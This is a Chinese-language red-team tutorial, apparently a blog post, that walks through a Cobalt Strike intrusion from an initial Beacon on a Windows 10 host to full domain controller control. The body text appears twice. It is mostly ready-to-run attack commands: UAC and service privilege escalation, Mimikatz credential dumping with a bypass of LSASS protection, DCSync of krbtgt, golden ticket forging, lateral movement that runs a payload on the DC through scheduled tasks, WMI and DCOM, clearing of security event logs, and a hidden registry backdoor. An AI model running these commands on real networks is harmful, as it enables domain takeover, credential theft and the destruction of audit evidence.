Cobalt Strike高级内网渗透从初始立足到域控攻陷的实战路径当你的Beacon终于在一台Windows 10主机上闪烁起来这仅仅是漫长战役的开始。真正的挑战在于如何从这个微不足道的User权限出发穿透层层防御最终掌控整个内网。本文将还原一次真实的红队行动展示如何组合运用Cobalt Strike的Access模块、Mimikatz和Golden Ticket等武器构建一条完整的攻击链。1. 初始立足点的巩固与侦察获得第一个Beacon会话后大多数初级测试人员会迫不及待地尝试提权操作这往往导致触发防御机制。更专业的做法是先进行低慢小的侦察# 获取基础系统信息 shell systeminfo | findstr /B /C:OS Name /C:OS Version shell whoami /all关键侦察点系统架构x86/x64已安装的补丁级别当前用户的权限组存在的安全软件进程提示使用net localgroup administrators查看本地管理员组这些账户往往是后续横向移动的跳板通过net view /domain确认目标是否处于域环境中后使用CS内置的端口扫描功能绘制网络拓扑扫描类型命令示例用途ARP扫描portscan 192.168.1.0/24 arp 1000发现存活主机TCP扫描portscan 192.168.1.10 icmp 445,3389确认关键端口2. 权限提升的艺术绕过UAC与服务漏洞当需要从User权限提升到Administrator时CS提供了两种经典路径UAC绕过elevate uac-dll listener_name这种技术通过DLL劫持实现成功率约70%但会留下明显的日志痕迹服务提权elevate svc-exe listener_name通过创建恶意Windows服务获取SYSTEM权限对老旧系统特别有效实际测试中发现现代Windows 10/11系统对这两种方式都有较强防护。此时可以尝试组合利用# 检查可写服务路径 shell accesschk.exe -uwcqv Authenticated Users * shell sc qc vulnerable_service提权技术对比表技术所需条件成功率隐蔽性UAC-DLL管理员账户中低SVC-EXE服务配置缺陷高中令牌窃取存在SYSTEM进程极高高3. 凭据收割Mimikatz的进阶用法获取管理员权限后传统的logonpasswords命令可能无法获取完整凭据。现代防御系统会拦截经典的Mimikatz调用此时需要采用模块化加载mimikatz !sekurlsa::logonpasswords mimikatz !lsadump::lsa /patch常见问题处理遇到Protected Process警告时使用!process::protect解除保护对于LSASS内存保护先执行!process::suspend暂停进程导出结果为空时尝试!crypto::patch修补加密函数注意在域控制器上执行lsadump::dcsync /user:krbtgt可直接获取黄金票据原料4. 黄金票据打造域内通行证获取krbtgt的NTLM哈希后构造黄金票据只需三个关键参数golden_ticket create -domain demo.com -sid S-1-5-21-... -krbtgt a9b8c7d6e5f4... -user fake_admin票据使用技巧设置超长有效期默认10年将普通域用户加入特权组Enterprise Admins通过make_token创建交互式会话# 验证票据有效性 shell klist shell dir \\dc01.demo.com\c$5. 横向移动的隐蔽通道拥有域管理员凭据后传统的PsExec方式容易被检测。更隐蔽的做法包括计划任务投递shell schtasks /create /s dc01 /tn Update /tr C:\payload.exe /sc once /st 00:00 /ru SYSTEM shell schtasks /run /s dc01 /tn UpdateWMI远程执行shell wmic /node:dc01 process call create cmd.exe /c start payload.exeDCOM组件滥用shell $com [activator]::CreateInstance([type]::GetTypeFromProgID(MMC20.Application,dc01))6. 痕迹清理与持久化完成目标后专业的红队会清理战场# 清除事件日志 shell wevtutil cl system shell wevtutil cl security # 删除计划任务 shell schtasks /delete /tn Update /f # 创建隐藏后门 persistence -reg -name WindowsUpdate -path C:\Windows\System32\update.exe持久化技术对比方法触发条件检测难度适用场景注册表用户登录中工作站服务系统启动高服务器WMI定时触发极高域控启动项用户登录低临时访问在真实的渗透测试中我曾遇到一个金融企业的内网通过组合使用服务提权和WMI横向移动最终在36小时内完成了从边缘员工机到域控的完整控制链。关键在于每个阶段都要准备备用方案——当UAC绕过失败时及时切换到服务漏洞利用当Mimikatz被拦截时改用注册表提取哈希。
Cobalt Strike实战:一次完整的Windows内网提权与哈希获取过程复盘(含Mimikatz、Golden Ticket技巧)
Cobalt Strike高级内网渗透从初始立足到域控攻陷的实战路径当你的Beacon终于在一台Windows 10主机上闪烁起来这仅仅是漫长战役的开始。真正的挑战在于如何从这个微不足道的User权限出发穿透层层防御最终掌控整个内网。本文将还原一次真实的红队行动展示如何组合运用Cobalt Strike的Access模块、Mimikatz和Golden Ticket等武器构建一条完整的攻击链。1. 初始立足点的巩固与侦察获得第一个Beacon会话后大多数初级测试人员会迫不及待地尝试提权操作这往往导致触发防御机制。更专业的做法是先进行低慢小的侦察# 获取基础系统信息 shell systeminfo | findstr /B /C:OS Name /C:OS Version shell whoami /all关键侦察点系统架构x86/x64已安装的补丁级别当前用户的权限组存在的安全软件进程提示使用net localgroup administrators查看本地管理员组这些账户往往是后续横向移动的跳板通过net view /domain确认目标是否处于域环境中后使用CS内置的端口扫描功能绘制网络拓扑扫描类型命令示例用途ARP扫描portscan 192.168.1.0/24 arp 1000发现存活主机TCP扫描portscan 192.168.1.10 icmp 445,3389确认关键端口2. 权限提升的艺术绕过UAC与服务漏洞当需要从User权限提升到Administrator时CS提供了两种经典路径UAC绕过elevate uac-dll listener_name这种技术通过DLL劫持实现成功率约70%但会留下明显的日志痕迹服务提权elevate svc-exe listener_name通过创建恶意Windows服务获取SYSTEM权限对老旧系统特别有效实际测试中发现现代Windows 10/11系统对这两种方式都有较强防护。此时可以尝试组合利用# 检查可写服务路径 shell accesschk.exe -uwcqv Authenticated Users * shell sc qc vulnerable_service提权技术对比表技术所需条件成功率隐蔽性UAC-DLL管理员账户中低SVC-EXE服务配置缺陷高中令牌窃取存在SYSTEM进程极高高3. 凭据收割Mimikatz的进阶用法获取管理员权限后传统的logonpasswords命令可能无法获取完整凭据。现代防御系统会拦截经典的Mimikatz调用此时需要采用模块化加载mimikatz !sekurlsa::logonpasswords mimikatz !lsadump::lsa /patch常见问题处理遇到Protected Process警告时使用!process::protect解除保护对于LSASS内存保护先执行!process::suspend暂停进程导出结果为空时尝试!crypto::patch修补加密函数注意在域控制器上执行lsadump::dcsync /user:krbtgt可直接获取黄金票据原料4. 黄金票据打造域内通行证获取krbtgt的NTLM哈希后构造黄金票据只需三个关键参数golden_ticket create -domain demo.com -sid S-1-5-21-... -krbtgt a9b8c7d6e5f4... -user fake_admin票据使用技巧设置超长有效期默认10年将普通域用户加入特权组Enterprise Admins通过make_token创建交互式会话# 验证票据有效性 shell klist shell dir \\dc01.demo.com\c$5. 横向移动的隐蔽通道拥有域管理员凭据后传统的PsExec方式容易被检测。更隐蔽的做法包括计划任务投递shell schtasks /create /s dc01 /tn Update /tr C:\payload.exe /sc once /st 00:00 /ru SYSTEM shell schtasks /run /s dc01 /tn UpdateWMI远程执行shell wmic /node:dc01 process call create cmd.exe /c start payload.exeDCOM组件滥用shell $com [activator]::CreateInstance([type]::GetTypeFromProgID(MMC20.Application,dc01))6. 痕迹清理与持久化完成目标后专业的红队会清理战场# 清除事件日志 shell wevtutil cl system shell wevtutil cl security # 删除计划任务 shell schtasks /delete /tn Update /f # 创建隐藏后门 persistence -reg -name WindowsUpdate -path C:\Windows\System32\update.exe持久化技术对比方法触发条件检测难度适用场景注册表用户登录中工作站服务系统启动高服务器WMI定时触发极高域控启动项用户登录低临时访问在真实的渗透测试中我曾遇到一个金融企业的内网通过组合使用服务提权和WMI横向移动最终在36小时内完成了从边缘员工机到域控的完整控制链。关键在于每个阶段都要准备备用方案——当UAC绕过失败时及时切换到服务漏洞利用当Mimikatz被拦截时改用注册表提取哈希。
